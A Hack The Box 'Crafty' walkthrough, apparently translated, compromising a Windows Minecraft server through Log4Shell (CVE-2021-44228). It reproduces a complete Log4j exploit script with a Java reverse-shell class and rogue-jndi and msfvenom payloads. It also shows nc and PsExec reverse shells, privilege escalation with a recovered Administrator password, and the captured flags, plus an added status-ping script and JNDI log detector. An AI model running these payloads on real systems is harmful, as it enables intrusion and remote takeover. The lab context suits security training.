Connect to the HTB server and start the target machine
Target IP: 10.10.11.249
Assigned IP: 10.10.16.8
Information gathering
Use rustscan to find the open TCP ports on the target
rustscan -a 10.10.11.249 -r 1-65535 --ulimit 5000
Use nmap to run script and service-version scans against the open ports
nmap -p 80,25565 -sCV 10.10.11.249
The scan results show that port 25565 on the target is running a Minecraft 1.16.5 server
Use curl to access port 80 on the target
curl -I http://10.10.11.249:80
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.249:80
HTTP/1.1 301 Moved Permanently
Content-Length: 140
Content-Type: text/html; charset=UTF-8
Location: http://crafty.htb
Server: Microsoft-IIS/10.0
Date: Sat, 23 Nov 2024 14:22:10 GMT
Add the target IP and this domain to the hosts file
echo '10.10.11.249 crafty.htb' >> /etc/hosts
Use curl to access the domain
curl -I http://crafty.htb
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://crafty.htb
HTTP/1.1 200 OK
Content-Length: 1826
Content-Type: text/html
Last-Modified: Fri, 27 Oct 2023 21:56:54 GMT
Accept-Ranges: bytes
ETag: "f431cf7f209da1:0"
Server: Microsoft-IIS/10.0
Date: Sat, 23 Nov 2024 14:28:19 GMT
Use a browser to visit the main domain
Add this subdomain and the target IP to the hosts file
echo '10.10.11.249 play.crafty.htb' >> /etc/hosts
Use curl to access the subdomain
curl -I http://play.crafty.htb
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://play.crafty.htb
HTTP/1.1 301 Moved Permanently
Content-Length: 140
Content-Type: text/html; charset=UTF-8
Location: http://crafty.htb
Server: Microsoft-IIS/10.0
Date: Sat, 23 Nov 2024 14:36:30 GMT
It redirects back to the main domain again, so try path fuzzing against the main domain
ffuf -u http://crafty.htb/FUZZ -w ../dictionary/Common-dir.txt
Use curl to access port 25565 on the target
curl http://crafty.htb:25565
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://crafty.htb:25565
curl: (1) Received HTTP/0.9 when not allowed
Force curl to accept HTTP/0.9
curl http://crafty.htb:25565 --http0.9
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl http://crafty.htb:25565 --http0.9
��{"translate":"disconnect.genericReason","with":["Internal Exception: io.netty.handler.codec.DecoderException: java.lang.IndexOutOfBoundsException: Index: 69, Size: 1"]}
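The error above is the server's packet decoder reading curl's request as Minecraft protocol: the leading 'G' (0x47) is taken as a packet length of 71 and 'E' (0x45) as packet id 69, and the handshake state has only one packet, hence "Index: 69, Size: 1". The script below, an added example that is not part of the original write-up, implements the status half of that protocol the way nmap fingerprinted the server (Handshake with protocol number 754, which is 1.16.4/1.16.5, followed by a Status Request) and parses the JSON reply; the host and port are the ones from above.

```python
import json
import socket
import struct

def encode_varint(value: int) -> bytes:
    """Minecraft VarInt: 7 data bits per byte, high bit set while more bytes follow."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        out.append(byte | 0x80 if value else byte)
        if not value:
            return bytes(out)

def decode_varint(buf: bytes, offset: int = 0) -> tuple:
    """Decode the VarInt at buf[offset]; return (value, offset just past it)."""
    result = 0
    for shift in range(0, 35, 7):          # a VarInt is at most 5 bytes
        byte = buf[offset]
        offset += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, offset
    raise ValueError("VarInt too long")

def frame(packet_id: int, payload: bytes) -> bytes:
    body = encode_varint(packet_id) + payload   # every uncompressed packet: len, id, payload
    return encode_varint(len(body)) + body

def handshake_packet(host: str, port: int, protocol_version: int = 754) -> bytes:
    """Handshake (id 0x00); 754 is the protocol number of 1.16.4/1.16.5, next state 1 = status."""
    addr = host.encode()
    payload = (encode_varint(protocol_version) + encode_varint(len(addr)) + addr
               + struct.pack(">H", port) + encode_varint(1))
    return frame(0x00, payload)

def parse_status_response(buf: bytes) -> dict:
    """Clientbound Status Response (id 0x00) carries one length-prefixed JSON string."""
    _, off = decode_varint(buf)            # total packet length
    pid, off = decode_varint(buf, off)
    if pid != 0x00:
        raise ValueError(f"unexpected packet id {pid}")
    slen, off = decode_varint(buf, off)
    return json.loads(buf[off:off + slen].decode())

def status_ping(host: str, port: int = 25565, timeout: float = 5.0) -> dict:
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(handshake_packet(host, port) + frame(0x00, b""))
        data = sock.recv(65535)            # one recv suffices for a typical status reply
    return parse_status_response(data)
```

status_ping("play.crafty.htb") returns the same version and player data the nmap script printed; a production inventory scanner should loop on recv until the length prefix is satisfied instead of relying on a single read.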
Search Google for vulnerabilities in the service hosted on the target's port 25565
Look up the vulnerability ID on CNNVD
Exploitation
Found an article on this vulnerability that includes both a client for connecting to the target's service and an EXP
Link: Exploiting Minecraft Servers (Log4j)
EXP
#!/usr/bin/env python3

import argparse
from colorama import Fore, init
import subprocess
import threading
from pathlib import Path
import os
from http.server import HTTPServer, SimpleHTTPRequestHandler

CUR_FOLDER = Path(__file__).parent.resolve()


def generate_payload(userip: str, lport: int) -> None:
    program = """
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {

    public Exploit() throws Exception {
        String host="%s";
        int port=%d;
        String cmd="/bin/sh";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
            while(pi.available()>0)so.write(pi.read());
            while(pe.available()>0)so.write(pe.read());
            while(si.available()>0)po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            }
            catch (Exception e){
            }
        };
        p.destroy();
        s.close();
    }
}
""" % (userip, lport)

    # writing the exploit to Exploit.java file
    p = Path("Exploit.java")

    try:
        p.write_text(program)
        subprocess.run([os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/javac"), str(p)])
    except OSError as e:
        print(Fore.RED + f'[-] Something went wrong {e}')
        raise e
    else:
        print(Fore.GREEN + '[+] Exploit java class created success')


def payload(userip: str, webport: int, lport: int) -> None:
    generate_payload(userip, lport)

    print(Fore.GREEN + '[+] Setting up LDAP server\n')

    # create the LDAP server on new thread
    t1 = threading.Thread(target=ldap_server, args=(userip, webport))
    t1.start()

    # start the web server
    print(f"[+] Starting Webserver on port {webport} http://0.0.0.0:{webport}")
    httpd = HTTPServer(('0.0.0.0', webport), SimpleHTTPRequestHandler)
    httpd.serve_forever()


def check_java() -> bool:
    exit_code = subprocess.call([
        os.path.join(CUR_FOLDER, 'jdk1.8.0_20/bin/java'),
        '-version',
    ], stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
    return exit_code == 0


def ldap_server(userip: str, lport: int) -> None:
    sendme = "${jndi:ldap://%s:1389/a}" % (userip)
    print(Fore.GREEN + f"[+] Send me: {sendme}\n")

    url = "http://{}:{}/#Exploit".format(userip, lport)
    subprocess.run([
        os.path.join(CUR_FOLDER, "jdk1.8.0_20/bin/java"),
        "-cp",
        os.path.join(CUR_FOLDER, "target/marshalsec-0.0.3-SNAPSHOT-all.jar"),
        "marshalsec.jndi.LDAPRefServer",
        url,
    ])


def main() -> None:
    init(autoreset=True)
    print(Fore.BLUE + """
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
""")

    parser = argparse.ArgumentParser(description='log4shell PoC')
    parser.add_argument('--userip', metavar='userip', type=str, default='localhost', help='Enter IP for LDAPRefServer & Shell')
    parser.add_argument('--webport', metavar='webport', type=int, default='8000', help='listener port for HTTP port')
    parser.add_argument('--lport', metavar='lport', type=int, default='9001', help='Netcat Port')

    args = parser.parse_args()

    try:
        if not check_java():
            print(Fore.RED + '[-] Java is not installed inside the repository')
            raise SystemExit(1)
        payload(args.userip, args.webport, args.lport)
    except KeyboardInterrupt:
        print(Fore.RED + "user interrupted the program.")
        raise SystemExit(0)


if __name__ == "__main__":
    main()
Clone the complete PoC locally
git clone https://github.com/kozmer/log4j-shell-poc.git
Enter the PoC directory
cd log4j-shell-poc-main
Install the PoC's dependencies
pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
Since the target is a Windows machine, the cmd variable in poc.py (String cmd="/bin/sh" in the embedded Java class) must be changed to: powershell.exe
Use the -h option to see the other parameters the script needs
python poc.py -h
┌──(root㉿kali)-[/home/kali/Desktop/temp/log4j-shell-poc-main]
└─# python poc.py -h

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

usage: poc.py [-h] [--userip userip] [--webport webport] [--lport lport]
log4shell PoC
options:
-h, --help show this help message and exit
--userip userip Enter IP for LDAPRefServer & Shell
--webport webport listener port for HTTP port
--lport lport Netcat Port
Here we just fill in the script's parameters following the usage above and run it
python poc.py --userip 10.10.16.8 --webport 8000 --lport 1425
It reports that jdk1.8.0_20 is missing; the bottom of the PoC's GitHub page gives a link to the resource
Link: Oracle website
Press Ctrl+F and search for: 8u20-
Once the JDK package has downloaded, extract it
tar xf jdk-8u20-linux-x64.tar.gz
Move it into the PoC directory
mv jdk1.8.0_20 log4j-shell-poc-main
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
jdk-8u20-linux-x64.tar.gz log4j-shell-poc-main
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# tar xf jdk-8u20-linux-x64.tar.gz
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ls
jdk1.8.0_20 jdk-8u20-linux-x64.tar.gz log4j-shell-poc-main
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# mv jdk1.8.0_20 log4j-shell-poc-main
Run the EXP again
python poc.py --userip 10.10.16.8 --webport 8000 --lport 1425
Download the Minecraft client
Link: TLauncher
After downloading, run the jar file with java
java -jar TLauncher.jar
Keep clicking Next through the installer until the version installation page appears
After setting the account name and version, click Settings
Once in the game, click Multiplayer
Click Add Server and enter play.crafty.htb as the server address
In the game, press the "T" key to open the chat box and enter the payload
Nothing happens at all, so here we try rogue-jndi instead
First download the tool
git clone https://github.com/veracode-research/rogue-jndi.git
Build it
mvn package
Generate the payload directly with this tool
java -jar target/RogueJndi-1.1.jar --command "powershell.exe iwr http://10.10.16.8:6666/nc.exe -O c:\windows\temp\nc.exe;c:\windows\temp\nc.exe 10.10.16.8 1425 -e powershell.exe" --hostname "10.10.16.8"
Full payload
${jndi:ldap://10.10.16.8:1389/o=reference}
Start an HTTP server so the target can fetch nc.exe
php -S 0:6666
Start listening locally
rlwrap -cAr nc -lvnp 1425
After repeating the step of sending the payload in the chat box, the local nc receives a callback
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.249] 49689
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\users\svc_minecraft\server> whoami
whoami
crafty\svc_minecraft
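From the defender's side, the chat message reaches the server log through Log4j, which is where the lookup fires, so the server log is the place to detect it. The detector below is an added example, not code from the write-up or from rogue-jndi: it resolves the nested lookup forms Log4j itself resolves before logging and flags any remaining ${jndi: string; the log lines are constructed, with the lookup string taken from the payload above.

```python
import re

# Lookup forms Log4j 2 resolves to plain text; they must be resolved before matching.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")     # ${env:UNSET:-j} -> j, ${::-j} -> j
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed Minecraft server log lines; line 2 carries the lookup string sent in chat above.
SAMPLE_LOG = [
    "[14:36:30] [Server thread/INFO]: <jacob> anyone online?",
    "[14:36:31] [Server thread/INFO]: <guest> ${jndi:ldap://10.10.16.8:1389/o=reference}",
    "[14:36:32] [Server thread/INFO]: <guest> ${${lower:j}ndi:${lower:l}dap://10.10.16.8:1389/o=reference}",
    "[14:36:33] [Server thread/INFO]: <jacob> selling 64 iron for ${10} each",
]


def _case_fold(m) -> str:
    text = m.group(2)
    return text.lower() if m.group(1).lower() == "lower" else text.upper()


def normalize(line: str, max_rounds: int = 10) -> str:
    """Resolve innermost lookups repeatedly, as the logger would, until nothing changes."""
    for _ in range(max_rounds):
        new = _DEFAULT.sub(r"\1", _CASE.sub(_case_fold, line))
        if new == line:
            break
        line = new
    return line


def is_jndi_lookup(line: str) -> bool:
    """True if the line, once de-obfuscated, still carries a JNDI lookup."""
    return _JNDI.search(normalize(line)) is not None


def scan_log(lines) -> list:
    """Return (line number, normalized line) for every entry carrying a JNDI lookup."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1) if is_jndi_lookup(l)]


if __name__ == "__main__":
    for n, hit in scan_log(SAMPLE_LOG):
        print(f"line {n}: {hit}")
```

Detection complements patching: for 1.12 to 1.16.5 servers Mojang's published mitigation is the log4j2_112-116.xml configuration passed with -Dlog4j.configurationFile, not the formatMsgNoLookups flag used for 1.17 and later.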
Find user_flag and check its location
gci -r c:\users\ user.txt -ea 0
gc "C:\users\svc_minecraft\Desktop\user.txt"
PS C:\users\svc_minecraft\server> gci -r c:\users\ user.txt -ea 0
gci -r c:\users\ user.txt -ea 0
Directory: C:\users\svc_minecraft\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/23/2024 5:45 AM 34 user.txt
PS C:\users\svc_minecraft\server> gc "C:\users\svc_minecraft\Desktop\user.txt"
gc "C:\users\svc_minecraft\Desktop\user.txt"
98c838cb49d32fe9588fa6d9ddbc407e
USER_FLAG:98c838cb49d32fe9588fa6d9ddbc407e
Automated privilege escalation
Check the target's system information
systeminfo
PS C:\users\svc_minecraft\server> systeminfo
systeminfo

Host Name: CRAFTY
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA944
Original Install Date: 4/10/2020, 9:48:06 AM
System Boot Time: 11/23/2024, 5:44:20 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.23553139.B64.2403260936, 3/26/2024
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,697 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,520 MB
Virtual Memory: In Use: 2,279 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CRAFTY
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.249
[02]: fe80::dae1:2bca:5335:e9f4
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Generate a 64-bit msf payload locally with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.8 LPORT=5555 -f exe -o shell.exe
Start the HTTP server again
php -S 0:8888
Download the payload onto the target (first find a directory you have write permission to)
iwr http://10.10.16.8:8888/shell.exe -O shell.exe
Start Metasploit
msfconsole
Use the handler module
use exploit/multi/handler
Configure the options and start listening: LHOST, LPORT, PAYLOAD
msf6 exploit(multi/handler) > set lport 5555
lport => 5555
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.8:5555
[*] Meterpreter session 1 opened (10.10.16.8:5555 -> 10.10.11.249:49740) at 2024-11-24 08:05:55 -0500

meterpreter >
Background the Meterpreter session
background
Switch to the local exploit suggester module
use multi/recon/local_exploit_suggester
Configure the option and run: SESSION
Switch to the privilege-escalation module
use windows/local/cve_2024_30088_authz_basep
Configure the options and run: LHOST, LPORT, PAYLOAD, SESSION
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.8:1212
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 17763
[*] Reflectively injecting the DLL into 5744...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 1720
[+] Successfully retrieved winlogon pid: 544
[*] Meterpreter session 2 opened (10.10.16.8:1212 -> 10.10.11.249:49742) at 2024-11-24 08:11:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Find root_flag and view its contents
meterpreter > search -f root.txt
Found 1 result...
=================

Path                                     Size (bytes)  Modified (UTC)
----                                     ------------  --------------
c:\Users\Administrator\Desktop\root.txt  34            2024-11-23 08:45:22 -0500

meterpreter > shell
Process 4580 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
e3ceb690ce79a39f0987422b52b14c8b
ROOT_FLAG:e3ceb690ce79a39f0987422b52b14c8b
Manual privilege escalation
Two jar files were found in C:\Users\svc_minecraft\server and its \plugins subdirectory
Set up an SMB server on the attacking machine
impacket-smbserver temp . -smb2support -username temp -password temp
Connect the target to that SMB server
net use \\10.10.16.8\temp /user:temp temp
Upload both files to the attacking machine
copy ./server.jar \\10.10.16.8\temp\server.jar
copy plugins/playercounter-1.0-SNAPSHOT.jar \\10.10.16.8\temp\playercounter-1.0-SNAPSHOT.jar
Disconnect the target from the attacking machine's SMB server
net use \\10.10.16.8\temp /delete
Decompiling playercounter-1.0-SNAPSHOT.jar with JD-GUI yields a hard-coded password
s67u84zKq8IXw
List the user accounts on the target
net user
PS C:\Users\svc_minecraft\server> net user
net user

User accounts for \\CRAFTY
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
jacob svc_minecraft WDAGUtilityAccount
The command completed successfully.
Attempting to enable WinRM fails
enable-psremoting -force
set-wsmanquickconfig -force
PS C:\Users\svc_minecraft\server> enable-psremoting -force
enable-psremoting -force
enable-psremoting : Access is denied. To run this cmdlet, start Windows PowerShell with the "Run as administrator"
option.
At line:1 char:1
+ enable-psremoting -force
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Enable-PSRemoting], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.EnablePSRemotingCommand
PS C:\Users\svc_minecraft\server> set-wsmanquickconfig -force
set-wsmanquickconfig -force
set-wsmanquickconfig : Access is denied. You need to run this cmdlet from an elevated process.
At line:1 char:1
+ set-wsmanquickconfig -force
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Set-WSManQuickConfig], InvalidOperationException
+ FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.WSMan.Management.SetWSManQuickConfigCommand
Start the HTTP server on the attacking machine again
php -S 0:8888
Download the RunasCs tool onto the target
iwr http://10.10.16.8:8888/RunasCs.exe -O RunasCs.exe
Start nc listening locally
rlwrap -cAr nc -lvnp 1426
Try to get a reverse shell as the Administrator user with the password found above
.\runascs.exe administrator 's67u84zKq8IXw' powershell -r 10.10.16.8:1426 -t 0
PS C:\Users\svc_minecraft\Desktop> .\runascs.exe administrator 's67u84zKq8IXw' powershell -r 10.10.16.8:1426 -t 0
.\runascs.exe administrator 's67u84zKq8IXw' powershell -r 10.10.16.8:1426 -t 0

[+] Running in session 1 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: WinSta0\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5784 created in background.
The local nc receives a callback
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1426
listening on [any] 1426 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.249] 49755
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
crafty\administrator
Download psexec and nc from the attacking machine onto the target
iwr http://10.10.16.8:8888/PsExec64.exe -O PsExec64.exe
iwr http://10.10.16.8:8888/nc.exe -O nc.exe
Start nc listening locally
rlwrap -cAr nc -lvnp 1427
As Administrator, use psexec to run a command as SYSTEM and get a reverse shell
.\PsExec64.exe -accepteula -i -s cmd.exe /c "C:\Users\svc_minecraft\Desktop\nc.exe 10.10.16.8 1427 -e powershell.exe"
The local nc receives a callback
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1427
listening on [any] 1427 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.249] 49761
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system